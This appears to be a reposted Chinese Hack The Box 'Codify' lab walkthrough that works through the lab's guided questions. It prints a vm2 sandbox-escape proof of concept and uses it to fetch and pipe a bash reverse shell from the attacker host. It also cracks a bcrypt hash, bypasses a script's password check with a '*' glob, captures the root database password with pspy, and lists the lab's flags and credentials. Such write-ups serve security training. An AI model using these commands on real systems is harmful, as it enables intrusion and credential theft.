HTB:Codify[WriteUP]
目录
1.Which is the highest open TCP port on Codify?
2.What is the relative path on the web application that offers a form to run JavaScript code?
3.What is the name of the sandboxing library used by the application?
5.What user is the web application running as?
7.What is the joshua user's password on Codify?
8.Submit the flag located in the joshua user's home directory.
USER_FLAG:e91eb1d8b760341e1e4c5d21b8ad78c2
9.What is the full path of the script that the joshua user can run as root?
10.Which single character is accepeted as the password, bypassing the password check in the script?
11.What is the root user's MySQL password?
12.Submit the flag located in the root user's home directory.
ROOT_FLAG:7f32c11faceea579277b7f2e9dd98edf
连接至HTB服务器并启动靶机
靶机IP:10.10.11.239
分配IP:10.10.14.12
1.Which is the highest open TCP port on Codify?
使用nmap对靶机TCP端口进行开放扫描
nmap -p- --min-rate=1500 -T5 -sS -Pn 10.10.11.239
由扫描结果可知,靶机开放最高端口号为:3000
2.What is the relative path on the web application that offers a form to run JavaScript code?
使用nmap对靶机开放的TCP端口进行脚本、服务信息扫描
nmap -p 22,80,3000 -sCV 10.10.11.239
使用curl访问靶机80端口
curl -I http://10.10.11.239:80
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# curl -I http://10.10.11.239:80
HTTP/1.1 301 Moved Permanently
Date: Wed, 06 Nov 2024 02:30:09 GMT
Server: Apache/2.4.52 (Ubuntu)
Location: http://codify.htb/
Content-Type: text/html; charset=iso-8859-1
由输出可见,访问被重定位至codify.htb
写hosts文件使该域名本地解析
echo '10.10.11.239 codify.htb' >> /etc/hosts
使用浏览器访问靶机80端口
感觉格式奇奇怪怪,这里尝试使用浏览器访问靶机3000端口
点击Try it now进入一个可以输入JS代码并运行的表单:/editor
3.What is the name of the sandboxing library used by the application?
进入About us查看该Web相关信息
国产化后:
关于我们
在Codify,我们的使命是让开发人员更容易测试他们的Node.js代码。我们理解测试代码可能既耗时又困难,这就是为什么我们构建这个平台来简化流程。
我们的团队由经验丰富的开发人员组成,他们热衷于创建使开发更容易的工具。我们致力于提供一个可靠和安全的平台,您可以信任它来测试您的代码。
感谢您使用Codify,我们希望我们的平台能帮助您开发更好的Node.js应用程序。
关于我们的代码编辑器我们的代码编辑器是一个强大的工具,允许开发人员在用户友好的环境中编写和测试Node.js代码。您可以直接在浏览器中编写和运行JavaScript代码,使您的应用程序易于实验和调试。
vm2库是一个广泛使用且值得信赖的JavaScript沙盒工具。它增加了额外的安全层,以防止潜在的有害代码对您的系统造成伤害。我们非常重视平台的安全性和可靠性,我们使用vm2来确保您的代码有一个安全的测试环境。
由描述可知,该沙箱版本为:vm2
4.What is the 2023 CVE ID assigned to a remote code execution vulnerability in vm2 that was patched in version 3.9.17?
使用searchsploit搜索该沙箱相关漏洞
searchsploit vm2
将该PoC拷贝到当前目录下
searchsploit -m 51898.c
查看该文件代码
cat 51898.c
/*
# Exploit Title: vm2 Sandbox Escape vulnerability
# Date: 23/12/2023
# Exploit Author: Calil Khalil & Adriel Mc Roberts
# Vendor Homepage: https://github.com/patriksimek/vm2
# Software Link: https://github.com/patriksimek/vm2
# Version: vm2 <= 3.9.19
# Tested on: Ubuntu 22.04
# CVE : CVE-2023-37466
*/const { VM } = require("vm2");
const vm = new VM();const command = 'pwd'; // Change to the desired command
const code = `
async function fn() {
(function stack() {
new Error().stack;
stack();
})();
}try {
const handler = {
getPrototypeOf(target) {
(function stack() {
new Error().stack;
stack();
})();
}
};const proxiedErr = new Proxy({}, handler);
throw proxiedErr;
} catch ({ constructor: c }) {
const childProcess = c.constructor('return process')().mainModule.require('child_process');
childProcess.execSync('${command}');
}
`;console.log(vm.run(code));
由代码注释可知,该PoC基于漏洞:CVE-2023-37466,直接往上交居然不对
直接在Google往上搜,框框一顿交终于找到了:CVE-2023-30547
5.What user is the web application running as?
那么我们一开始在searchsploit找到的PoC到底能不能用呢,现在尝试一下
截取PoC中的EXP部分,直接提交利用
本地创建一个反弹Shell
echo 'bash -i >& /dev/tcp/10.10.14.12/1425 0>&1' > revr.sh
使用python开启HTTP服务
python -m http.server 7777
本地侧nc开始监听
nc -lvnp 1425
靶机沙箱表单提交处对代码进行修改以访问本地侧Bash文件
const command = 'curl 10.10.14.12:7777/revr.sh|bash';
本地侧nc收到回显
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nc -lvnp 1425
listening on [any] 1425 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.11.239] 49766
bash: cannot set terminal process group (1267): Inappropriate ioctl for device
bash: no job control in this shell
svc@codify:~$ whoami
whoami
svc
执行whoami命令,由回显可知当前用户为:svc
6.There is a second NodeJS application on Codify that isn't running. What is the name of the SQLite database file used by this application?
在/var/www/contact目录下可见一个db文件:tickets.db
ls /var/www/contact
svc@codify:~$ ls /var/www/contact
ls /var/www/contact
index.js
package.json
package-lock.json
templates
tickets.db
7.What is the joshua user's password on Codify?
查看该文件内容
strings /var/www/contact/tickets.db
其中出现了用户名+密码哈希
joshua$2a$12$SOn8Pf6z8fO/nVsNbAAequ/P6vLRJJl7gCUEiYBU2iLHn4G/p/Zw2
使用hashid判断该哈希值类型
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# echo '$2a$12$SOn8Pf6z8fO/nVsNbAAequ/P6vLRJJl7gCUEiYBU2iLHn4G/p/Zw2' > hash
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# hashid < hash
Analyzing '$2a$12$SOn8Pf6z8fO/nVsNbAAequ/P6vLRJJl7gCUEiYBU2iLHn4G/p/Zw2'
[+] Blowfish(OpenBSD)
[+] Woltlab Burning Board 4.x
[+] bcrypt
使用man命令查看hashcat手册,查看该哈希类型在hashcat中的参数选项
使用hashcat对该哈希进行爆破
hashcat -m 3200 hash ../dictionary/rockyou.txt --quiet
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# hashcat -m 3200 hash ../dictionary/rockyou.txt --quiet
$2a$12$SOn8Pf6z8fO/nVsNbAAequ/P6vLRJJl7gCUEiYBU2iLHn4G/p/Zw2:spongebob1
账户:joshua
密码:spongebob1
8.Submit the flag located in the joshua user's home directory.
使用上文凭证连接靶机SSH服务
ssh joshua@10.10.11.239
查找user_flag位置并查看其内容
joshua@codify:~$ find / -name 'user.txt' 2>/dev/null
/home/joshua/user.txt
joshua@codify:~$ cat /home/joshua/user.txt
e91eb1d8b760341e1e4c5d21b8ad78c2
USER_FLAG:e91eb1d8b760341e1e4c5d21b8ad78c2
9.What is the full path of the script that the joshua user can run as root?
查看当前用户可特权运行的命令
sudo -l
joshua@codify:~$ sudo -l
[sudo] password for joshua:
Matching Defaults entries for joshua on codify:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_ptyUser joshua may run the following commands on codify:
(root) /opt/scripts/mysql-backup.sh
可特权运行的文件完整路径为:/opt/scripts/mysql-backup.sh
10.Which single character is accepeted as the password, bypassing the password check in the script?
查看该文件内容
cat /opt/scripts/mysql-backup.sh
#!/bin/bash
DB_USER="root"
DB_PASS=$(/usr/bin/cat /root/.creds)
BACKUP_DIR="/var/backups/mysql"
read -s -p "Enter MySQL password for $DB_USER: " USER_PASS
/usr/bin/echo
if [[ $DB_PASS == $USER_PASS ]]; then
/usr/bin/echo "Password confirmed!"
else
/usr/bin/echo "Password confirmation failed!"
exit 1
fi
/usr/bin/mkdir -p "$BACKUP_DIR"
databases=$(/usr/bin/mysql -u "$DB_USER" -h 0.0.0.0 -P 3306 -p"$DB_PASS" -e "SHOW DATABASES;" | /usr/bin/grep -Ev "(Database|information_schema|performance_schema)")
for db in $databases; do
/usr/bin/echo "Backing up database: $db"
/usr/bin/mysqldump --force -u "$DB_USER" -h 0.0.0.0 -P 3306 -p"$DB_PASS" "$db" | /usr/bin/gzip > "$BACKUP_DIR/$db.sql.gz"
done
/usr/bin/echo "All databases backed up successfully!"
/usr/bin/echo "Changing the permissions"
/usr/bin/chown root:sys-adm "$BACKUP_DIR"
/usr/bin/chmod 774 -R "$BACKUP_DIR"
/usr/bin/echo 'Done!'
代码审计后可知,DB_PASS是通过cat .creds得来,并且通过“==”来与要求我们所输入的USER_PASS进行匹配
那么只需要输入“*”(USER_PASS)与之(DB_PASS)匹配,则条件永远为真
11.What is the root user's MySQL password?
使用pspy工具监测靶机进程活动抓取数据库密码
攻击机通过python开启http服务,靶机使用wget将文件下载
joshua@codify:~$ wget http://10.10.14.12:7777/pspy64s -O pspy64s
--2024-11-06 10:50:48-- http://10.10.14.12:7777/pspy64s
Connecting to 10.10.14.12:7777... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1233888 (1.2M) [application/octet-stream]
Saving to: ‘pspy64s’pspy64s 100%[======================================================================================================================>] 1.18M 2.57MB/s in 0.5s
2024-11-06 10:50:49 (2.57 MB/s) - ‘pspy64s’ saved [1233888/1233888]
joshua@codify:~$ ls
pspy64s user.txt
为pspy64s文件赋执行权限
chmod +x pspy64s
运行该文件对靶机进程持续监听
./pspy64s -i 1000
重新启动一个SSH服务连接至靶机
ssh joshua@10.10.11.239
直接特权运行mysql-backup.sh文件
sudo /opt/scripts/mysql-backup.sh
在提示:Enter MySQL password for root时输入星号(*)
joshua@codify:~$ sudo /opt/scripts/mysql-backup.sh
Enter MySQL password for root:
Password confirmed!
mysql: [Warning] Using a password on the command line interface can be insecure.
Backing up database: mysql
mysqldump: [Warning] Using a password on the command line interface can be insecure.
-- Warning: column statistics not supported by the server.
mysqldump: Got error: 1556: You can't use locks with log tables when using LOCK TABLES
mysqldump: Got error: 1556: You can't use locks with log tables when using LOCK TABLES
Backing up database: sys
mysqldump: [Warning] Using a password on the command line interface can be insecure.
-- Warning: column statistics not supported by the server.
All databases backed up successfully!
Changing the permissions
Done!
在靶机的另一边SSH服务中,可见回显中存在数据库登录密码
kljh12k3jhaskjh12kjh3
12.Submit the flag located in the root user's home directory.
这里直接拿这个密码对靶机ROOT用户进行切换即可
su -
joshua@codify:~$ su -
Password:
root@codify:~# whoami
root
查找root_flag位置并查看其内容
root@codify:~# find / -name 'root.txt'
/root/root.txt
root@codify:~# cat /root/root.txt
7f32c11faceea579277b7f2e9dd98edf
ROOT_FLAG:7f32c11faceea579277b7f2e9dd98edf
原文地址:https://blog.csdn.net/qq_43007452/article/details/143563016
免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!